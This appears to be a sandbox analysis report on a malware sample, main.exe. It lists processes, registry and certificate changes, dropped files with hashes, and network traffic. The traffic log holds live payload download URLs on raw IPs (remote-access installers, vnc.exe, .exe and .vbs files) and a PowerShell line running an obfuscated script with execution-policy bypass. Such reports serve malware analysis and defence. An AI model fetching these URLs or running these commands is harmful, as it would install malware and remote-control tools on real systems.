c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1652nk.exeC:\Users\admin\Desktop\a\nk.exe
main.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\admin\desktop\a\nk.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
1656\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1904"C:\Users\admin\Desktop\main.exe" C:\Users\admin\Desktop\main.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\admin\desktop\main.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
2088powershell.exe -ExecutionPolicy Bypass -File Invoke-NiceLittleKittieobf.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
main.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
2220Silentum_Spoofer.exeC:\Users\admin\Desktop\a\Silentum_Spoofer.exe
main.exe
User:
admin
Integrity Level:
HIGH
Description:
Version:
0.0.0.0
Modules
Images
c:\users\admin\desktop\a\silentum_spoofer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2232C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
Total events
424 562
Read events
411 858
Write events
860
Delete events
11 844

Modification events

(PID) Process:(6908) ctfmon.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Input\TypingInsights
Operation:writeName:Insights
Value:
02000000071DE8C131CC8360A3D6D9C1330A686B165ABA2E235F5A5C
(PID) Process:(4696) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Security and Maintenance\Checks\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.check.0
Operation:writeName:CheckSetting
Value:
23004100430042006C006F00620000000000000000000000010000000800000000000000
(PID) Process:(4696) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000090302
Operation:writeName:VirtualDesktop
Value:
100000003030445602603FA5B72DE44882A417B3949BF781
(PID) Process:(7712) Taskmgr.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager
Operation:delete valueName:Preferences
Value:
(PID) Process:(4696) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:000000000007025E
Operation:writeName:VirtualDesktop
Value:
100000003030445602603FA5B72DE44882A417B3949BF781
(PID) Process:(2648) support.client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:
(PID) Process:(2648) support.client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation:writeName:Blob
Value:
0300000001000000140000007B0F360B775F76C94A12CA48445AA2D2A875701C2000000001000000B4060000308206B030820498A003020102021008AD40B260D29C4C9F5ECDA9BD93AED9300D06092A864886F70D01010C05003062310B300906035504061302555331153013060355040A130C446967694365727420496E6331193017060355040B13107777772E64696769636572742E636F6D3121301F060355040313184469676943657274205472757374656420526F6F74204734301E170D3231303432393030303030305A170D3336303432383233353935395A3069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E6720525341343039362053484133383420323032312043413130820222300D06092A864886F70D01010105000382020F003082020A0282020100D5B42F42D028AD78B75DD539591BB18842F5338CEB3D819770C5BBC48526309FA48E68D85CF5EB342407E14B4FD37843F417D71EDAF9D2D5671A524F0EA157FC8899C191CC81033E4D702464B38DE2087D347D4C8057126B439A99F2C53B1FF2EFCB475A13A64CB3012025F310D38BB2FB08F08AE09D09C065A7FA98804935873D5119E8902178452EA19F2CE118C21ACCC5EE93497042328FFBC6EA1CF3656891A24D4C8211485268DE10BD14575DE8181365C57FB24F852C48A4568435D6F92E9CAA0015D137FE1A0694C27CC8EA1B32E6CAC2F4A7A3030E74A5AF39B6AB6012E3E8D6B9F731E1DCADE418A0D8C1234747B3A10F6EA3AB6D9806831BB76A672DD2BD441A9210818FB03B09D7C79B325AC2FF6A60548B49C193EDE1B45CE06FEB26F98CD5B2F93810E6EACE91F5BED3FB6F9361345CBC93452883362A66285FB073CE8B262506B283D45CF615194CED62E05E33F2E8E8EC0AA7B0032B91B23679BEF7AD081E75A665CCBBE34850F377911AFEDB50A246C8615898F57C02163C8328AD3986ECD4B70D53D0F847E675308DEC30937614A65B4B5D74614D3F129176DEBF58CB72102941F0D5C56D267668114113589ADC262B01F4894D59DB78CF814A3E40475FC98150738510232159608A6454C1CC211AE838197C661CCD78384530994FFF634F4CBBAA0D0853417C583D47B3FAB6EC8C320902CC6C3C0C56110203010001A38201593082015530120603551D130101FF040830060101FF020100301D0603551D0E041604146837E0EBB63BF85F1186FBFE617B088865F44E42301F0603551D23041830168014ECD7E382D2715D644CDF2E673FE7BA98AE1C0F4F300E0603551D0F0101FF04040302018630130603551D25040C300A06082B06010505070303307706082B06010505070101046B3069302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D304106082B060105050730028635687474703A2F2F636163657274732E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63727430430603551D1F043C303A3038A036A0348632687474703A2F2F63726C332E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63726C301C0603551D20041530133007060567810C01033008060667810C010401300D06092A864886F70D01010C050003820201003A23443D8D0876EE8FBC3A99D356E0021AA5F84834F32CB6E67466F79472B100CAAF6C302713129E90449F4BFD9EA37C26D537BC3A5D486D95D53F49F427BB16814550FD9CBDB685E0767E3771CB22F75AAA90CFF5936AE3EB20D1D55079889A8A8AC1B6BDA148187EDCD8801A111918CD61998156F6C9E376E7C4E41B5F43F83E94FF76393D9ED499CF4ADD28EB5F26A1955848D51AFED7273FFD90D17686DD1CB0605CF30DA8EEE089A1BD39E1384EDA6EBB369DFBE521535AC3CAE96AF1A23EDB43B833C84F38149299F5DDCE546DD95D02141F40337C03E295B2C221757352CB46D8C4341CA2A54B8DCD6F76372C853F1ACE26E918BE9007B0437F9588208270F0CCCAEFFD29355C1F893855F7378A8B09A1CB0BE9311AFF2E195C3971E1BE9CA70A06D62667B792E64E5FDE7AAC49CF2EA47492ADDB3CA49C861FE3C1561B2B23FF8FB5EA887B706BE6A0BAFD3A3F45A6C4E81691528B41C048844B964DAB4440E38DF01528CEEDF11856072A2F10C40C08643C338FAE288C3CCB8F880B0DBF3BF4CE1E7B8EEFB5EBCBB7F07713E6E7283FAC12AEA52F226C41F9825C1566CC6C0ECAC586C3F626330C074BA0D307026A6A4030484B34A85120BBAD1B8508E2590D6DCA05502BEA4A1C9EA5FDA0A71F0674E7F2D65290FDAF854821F9573BB49C03ED8645F4B4616EBF68E2266086EAC8AFA9FE941DE7631B3A8656784E
(PID) Process:(2648) support.client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:FF8BFAFA697459874FB9843B1EFDA5C91871A44C
Value:
(PID) Process:(2648) support.client.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\FF8BFAFA697459874FB9843B1EFDA5C91871A44C
Operation:writeName:Blob
Value:
030000000100000014000000FF8BFAFA697459874FB9843B1EFDA5C91871A44C2000000001000000640700003082076030820548A00302010202100FC890218EBC1B3C4B8521F655979371300D06092A864886F70D01010B05003069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E67205253413430393620534841333834203230323120434131301E170D3232303731333030303030305A170D3235303731323233353935395A3065310B30090603550406130255533110300E06035504081307466C6F72696461310E300C0603550407130554616D706131193017060355040A1310436F6E6E656374776973652C204C4C433119301706035504031310436F6E6E656374776973652C204C4C4330820222300D06092A864886F70D01010105000382020F003082020A0282020100DA5D7B6EB44D5D8C63F7C47C18A1BF98759158E061191810BE4001B75443BD96E1DE68459FD72F7FE20ABCDAB9D10541D5B333A191C8694E70EADEB590A46FBACC4BF1E580E3D49900107F31A44BB0761C26E95F32D3D2076FC1CE1550FCC9B80D3A9E126CF948F5D78907F82795BD1C5437F87F582A9CFA3C9ADFB079D3AF1B267A35C2FED12B99AA072DB1A974D8B3704831F91C07C343F8BDFE52A88A5A9BA1CE87A957EED596EA5AF8DC2821F8970898355D467621F188CDA371CBF194625AC45E7682AFC4A7687DFDF58FA12F67DA9F8868F8F1BBAFAA5455922FCE755CCEEEE2C4CAA8C74350420396F445E5B8E2340DDCA227CE4846A787150FF50B982A02FAC5722E2630DA9E7F4F11F61D46C4A3A741834DE00BA96FE8D0EEC53B8D7332FC8567D59DAE58C9DA2B4CD394391F1A35C075CE76E4F58118F42CFFD0F9D097D86E6E40E7174583B89EA38DE2885B9AEED147EFA57DDC17AD421B2C9323575A9E0194576825AED3B586A072B2F4DC6194A5566976865079AC988B1C0CADFD10851BE62B1F79CAD6A937F874EAB8CB3651E29E862D5CAFE9D1B42A83F335D2ABA6EC4EF9D9AA115A069C24916D645DE415844DC365C616628665BA45D57E5A4E9AC0A5B414E8833ED77E4591647937E6F496D5CB708E29E3CA60ED81D594C9954186E08E7DBF3555F0A0A4E56625B4DFDC46577D88321B4719CC21B0A7AD0203010001A382020630820202301F0603551D230418301680146837E0EBB63BF85F1186FBFE617B088865F44E42301D0603551D0E04160414294F9BFF00EDB7D66B2218307D77A83F5C2B0D85300E0603551D0F0101FF04040302078030130603551D25040C300A06082B060105050703033081B50603551D1F0481AD3081AA3053A051A04F864D687474703A2F2F63726C332E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C3053A051A04F864D687474703A2F2F63726C342E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C303E0603551D20043730353033060667810C0104013029302706082B06010505070201161B687474703A2F2F7777772E64696769636572742E636F6D2F43505330819406082B06010505070101048187308184302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D305C06082B060105050730028650687474703A2F2F636163657274732E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E637274300C0603551D130101FF04023000300D06092A864886F70D01010B050003820201004E334E35453D2EC365082BD7E988392596A078B66CC91A7D52995886D9D2EF5EB1160E611AB54B00704E0CD7FDF1271871D56584CE06413B96E26D0396EB657CBBD5C12039D0130D52E31D1A7A186CA20878378C832655DB9AF8FC8E0672CA942D35FD13EE8803A7A747A502FF39CE8BBB6B054D78BE49EDB5A70F7C5C9A0EDF3A6A7E3DE78AC01B08A05198C6A4CCD6443CED8F4D9A65A23E67B09A93AFE01C2E3F3D90581CF5138F931A3AF8A15F27CE1A515A1A47F177392D6D3729BC62CE606793D202B89FF88531F035675680E405B49414971BF9F36528C1C44ED17CED9DEE353C14465719A0391E3197D851DF01AE8E36CB7918A26CA2EEC0DA555C4FA072F05A7EE59382E093A4EDD2698645C04A17A3903CA9FDAB62E033FEC0F8653DD193B9050A78B0E1101B73CE2CAF73A677373783D2A1EE3CE794055E0535AC1EDC9EB133E043D16CB6F811F2D7CC855F098673920D0948C2F93A705EEA762CA78AFD8D4B47A5F4F5EC02B34D77DEFBBE7E854B50B26182DC05BA265FE3BDE3FBD6A12F2AA9656D39361D93425789714323D74FFEF6347A5AE3E44A6322D76E604BF759BEE5F7A8023D55A2356FD9ED1041D584FED8C27697369A1BE159C96722B21A92A6C4D9D17DAC189B047538F099B1A3D1EF72882F0E09A767D622F371976CD4B95E6357C2C7B97499B81F04607C9FE72A0BD13F1C899107531D4785B7
(PID) Process:(4696) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:writeName:IconNameVersion
Value:
1
Executable files
641
Suspicious files
1 032
Text files
780
Unknown types
181

Dropped files

PID
Process
Filename
Type
1904main.exeC:\Users\admin\AppData\Local\Temp\_MEI19042\_bz2.pydexecutable
MD5:684D656AADA9F7D74F5A5BDCF16D0EDB
SHA256:A5DFB4A663DEF3D2276B88866F6D220F6D30CC777B5D841CF6DBB15C6858017C
1904main.exeC:\Users\admin\AppData\Local\Temp\_MEI19042\VCRUNTIME140.dllexecutable
MD5:32DA96115C9D783A0769312C0482A62D
SHA256:8B10C53241726B0ACC9F513157E67FCB01C166FEC69E5E38CA6AADA8F9A3619F
4696explorer.exeC:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dattext
MD5:E49C56350AEDF784BFE00E444B879672
SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E
1904main.exeC:\Users\admin\AppData\Local\Temp\_MEI19042\_decimal.pydexecutable
MD5:21FCB8E3D4310346A5DC1A216E7E23CA
SHA256:9A0E05274CAD8D90F6BA6BC594261B36BFBDDF4F5CA6846B6367FE6A4E2FDCE4
1904main.exeC:\Users\admin\AppData\Local\Temp\_MEI19042\_asyncio.pydexecutable
MD5:56F958EEBBC62305B4BF690D61C78E28
SHA256:50631361EF074BE42D788818AF91D0301D22FA24A970F41F496D8272B92CFE31
1904main.exeC:\Users\admin\AppData\Local\Temp\_MEI19042\_ctypes.pydbinary
MD5:29873384E13B0A78EE9857604161514B
SHA256:3CC8500A958CC125809B0467930EBCCE88A09DCC0CEDD7A45FACF3E332F7DB33
1904main.exeC:\Users\admin\AppData\Local\Temp\_MEI19042\_cffi_backend.cp313-win_amd64.pydexecutable
MD5:5CBA92E7C00D09A55F5CBADC8D16CD26
SHA256:0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85
1904main.exeC:\Users\admin\AppData\Local\Temp\_MEI19042\_lzma.pydexecutable
MD5:D63E2E743EA103626D33B3C1D882F419
SHA256:7C2D2030D5D246739C5D85F087FCF404BC36E1815E69A8AC7C9541267734FC28
1904main.exeC:\Users\admin\AppData\Local\Temp\_MEI19042\_hashlib.pydexecutable
MD5:3E540EF568215561590DF215801B0F59
SHA256:0ED7A6ED080499BC6C29D7113485A8A61BDBA93087B010FCA67D9B8289CBE6FA
1904main.exeC:\Users\admin\AppData\Local\Temp\_MEI19042\_multiprocessing.pydexecutable
MD5:807DD90BE59EA971DAC06F3AAB4F2A7E
SHA256:B20DD6F5FAB31476D3D8D7F40CB5AB098117FA5612168C0FF4044945B6156D47
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
241
TCP/UDP connections
5 557
DNS requests
293
Threats
801

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2456
main.exe
GET
200
203.159.90.22:80
http://203.159.90.22/Bin/ScreenConnect.ClientSetup.exe
DE
executable
5.40 Mb
unknown
2456
main.exe
GET
404
178.16.54.109:80
http://178.16.54.109/9.exe
SC
binary
123 b
malicious
2456
main.exe
GET
200
91.92.241.243:80
http://91.92.241.243/files/file_c8e4af3ea647650f.exe
SC
executable
950 Kb
unknown
2456
main.exe
GET
200
203.159.90.22:80
http://203.159.90.22/bin/support.client.exe
DE
executable
305 Kb
unknown
2456
main.exe
GET
200
20.198.18.136:8080
http://20.198.18.136:8080/agent.x64.exe
US
executable
103 Kb
unknown
2456
main.exe
GET
168.222.254.210:8079
http://168.222.254.210:8079/52.exe
GB
malicious
2456
main.exe
GET
168.222.254.210:8079
http://168.222.254.210:8079/5252.exe
GB
unknown
2456
main.exe
GET
200
91.92.242.236:80
http://91.92.242.236/oPvjr94jfe/Plugins/vnc.exe
SC
executable
112 Kb
unknown
2456
main.exe
GET
46.151.182.40:80
http://46.151.182.40/win32.vbs
US
unknown
2456
main.exe
GET
46.151.182.40:80
http://46.151.182.40/win64.vbs
US
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5276
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:137
Not routed
whitelisted
48.192.1.64:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
680
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
2456
main.exe
151.101.66.49:443
urlhaus.abuse.ch
FASTLY
US
whitelisted
2456
main.exe
31.57.97.20:443
FZINK
DE
unknown
2456
main.exe
124.198.132.37:443
SERVICES-1337-GMBH 1337-SERVICES-GMBH-NETWORK
DE
unknown
2456
main.exe
103.83.86.91:443
WHITELABEL
US
unknown
2456
main.exe
124.198.132.54:443
SERVICES-1337-GMBH 1337-SERVICES-GMBH-NETWORK
DE
malicious

DNS requests

Domain
IP
Reputation
activation-v2.sls.microsoft.com
  • 48.192.1.64
whitelisted
google.com
  • 142.251.14.113
  • 142.251.14.102
  • 142.251.14.138
  • 142.251.14.100
  • 142.251.14.101
  • 142.251.14.139
  • 142.251.13.138
  • 142.251.13.102
  • 142.251.13.139
  • 142.251.13.113
  • 142.251.13.101
  • 142.251.13.100
whitelisted
urlhaus.abuse.ch
  • 151.101.66.49
  • 151.101.130.49
  • 151.101.2.49
  • 151.101.194.49
whitelisted
plasteredplayn.com
  • 198.54.119.143
malicious
github.com
  • 140.82.121.4
whitelisted
raw.githubusercontent.com
  • 185.199.110.133
  • 185.199.108.133
  • 185.199.111.133
  • 185.199.109.133
whitelisted
release-assets.githubusercontent.com
  • 185.199.108.133
  • 185.199.111.133
  • 185.199.109.133
  • 185.199.110.133
whitelisted
furystaff.tech
  • 185.149.120.3
unknown
jin.com.my
  • 103.175.50.65
unknown
themaintechnician.us
  • 104.168.33.3
unknown

Threats

PID
Process
Class
Message
2456
main.exe
A Network Trojan was detected
ET MALWARE Suspicious bot.exe Request
2456
main.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 14
2456
main.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 19
2456
main.exe
Misc activity
INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET)
2456
main.exe
Misc activity
POLICY [ANY.RUN] Python requests User-agent in HTTP request
2456
main.exe
Misc activity
INFO [ANY.RUN] Connection to IP from commonly abused ASN (AS214943 RAILNET)
2456
main.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 11
2456
main.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 53
2456
main.exe
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
2456
main.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 7
Process
Message
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
dfsvc.exe
*** Status originated: -1073741811 *** Source File: onecore\com\netfx\windowsbuilt\iso_legacy\base\isolation\hier_hierarchy.cpp, line 230
popapoers.exe
This assembly was protected by demo version of ArmDot more than 7 days ago Buy full version at https://www.armdot.com/order.html
popapoers.exe
"
dxwsetup.exe
DLL_PROCESS_ATTACH
dxwsetup.exe
Invalid parameter passed to C runtime function.
dxwsetup.exe
Invalid parameter passed to C runtime function.
dxwsetup.exe
DLL_PROCESS_DETACH
dxwsetup.exe
DLL_PROCESS_DETACH
v38438.exe
CLR: Managed code called FailFast without specifying a reason.